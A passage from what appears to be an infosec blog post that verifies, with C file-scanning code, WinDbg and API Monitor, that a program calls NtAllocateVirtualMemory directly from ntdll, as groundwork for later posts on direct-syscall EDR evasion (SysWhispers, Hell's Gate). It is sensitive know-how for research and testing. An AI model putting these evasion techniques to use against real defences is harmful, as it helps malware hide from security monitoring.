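    assert(buf != NULL && needle != NULL);
    size_t n = strlen(needle);
    if (n == 0 || n > len) return 0;
    for (size_t i = 0; i + n <= len; i++) {
        if (memcmp(buf + i, needle, n) == 0) return 1;
    }
    return 0;
}

/* Reads the whole file and scans it.
   Returns 1 (found), 0 (not found) or -1 (I/O or allocation error). */
int file_contains(const char *path, const char *needle)
{
    FILE *f = fopen(path, "rb");
    if (f == NULL) return -1;

    int result = -1;
    unsigned char *buf = NULL;
    if (fseek(f, 0, SEEK_END) == 0) {
        long size = ftell(f);
        if (size >= 0 && fseek(f, 0, SEEK_SET) == 0) {
            buf = (unsigned char *)malloc(size > 0 ? (size_t)size : 1);
            if (buf != NULL &&
                fread(buf, 1, (size_t)size, f) == (size_t)size) {
                result = buffer_contains(buf, (size_t)size, needle);
            }
        }
    }
    free(buf);
    fclose(f);
    return result;
}
```

For example, file_contains("NativeWinApi.exe", "NtAllocateVirtualMemory") (the file name is an assumption about how the build is named) should return 1 as long as the function name is stored as a plain ASCII string, even though dumpbin /imports does not list it.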

With another Windows tool, WinDbg, it is possible to debug executables and set breakpoints. It can be downloaded from the Microsoft Store (see the link in the resources). After loading the NativeWinApi executable we immediately see that ntdll.dll is loaded (it is mapped into every user-mode Windows process, which is also why GetModuleHandleA can find it without loading it first). So there is progress.

Afterward, I set a breakpoint on NtAllocateVirtualMemory. After running the program we see a hit! The function is resolved inside ntdll, as seen from the line ntdll!NtAllocateVirtualMemory and the assembly code below it.

Nice, this verifies that NtAllocateVirtualMemory is still being called from ntdll!

Next, we use a tool called API Monitor. It helps visualize the individual Windows API calls made by a monitored application. The image below shows the monitored HighLevelApi program. Here we see that HighLevelApi.exe calls the VirtualAlloc API directly (which is of course what we implemented in the code) and that KernelBase.dll is responsible for the NtAllocateVirtualMemory request.

I don't know why API Monitor only shows KernelBase.dll and not Kernel32.dll, which differs from the imports that dumpbin shows. I expect that it doesn't visualize the forward from kernel32 to kernelbase, or that it is an error in the visualization.

HighLevelApi calling VirtualAlloc, where NtAllocateVirtualMemory is performed in KERNELBASE.dll

In the next image, we see the API usage of the code that uses the native Windows API. As expected, we now see GetModuleHandleA being used to get a handle to ntdll.dll (which would already be suspicious), followed by the direct call to NtAllocateVirtualMemory. So we successfully called the function directly!

WindowsNativeAPI directly calling NtAllocateVirtualMemory!

Conclusion

I found it interesting to really dig into the code that forms the basics of the Windows API. In the next blogs I will dive even deeper, and then we will really implement direct syscalls by investigating SysWhispers, Halo's Gate, Hell's Gate and FreshyCalls! It will be interesting to see what the community has already found out!

Happy testing!

If you want to discuss anything related to infosec I’m on LinkedIn: https://www.linkedin.com/in/bobvanderstaak/

Resources used:

https://perspectiverisk.com/a-practical-guide-to-bypassing-userland-api-hooking/#:~:text=API%20hooking%20is%20a%20technique,be%20hooked%20by%20the%20EDR.

Microsoft explaining the workings of NtAllocateVirtualMemory:

https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-ntallocatevirtualmemory

From that page: "Memory allocated by calling NtAllocateVirtualMemory must be freed by calling NtFreeVirtualMemory."

Microsoft's take on the RtlCopyMemory routine:

https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-rtlcopymemory

https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/getting-started-with-windbg

https://learn.microsoft.com/en-us/windows/win32/win7appqual/new-low-level-binaries
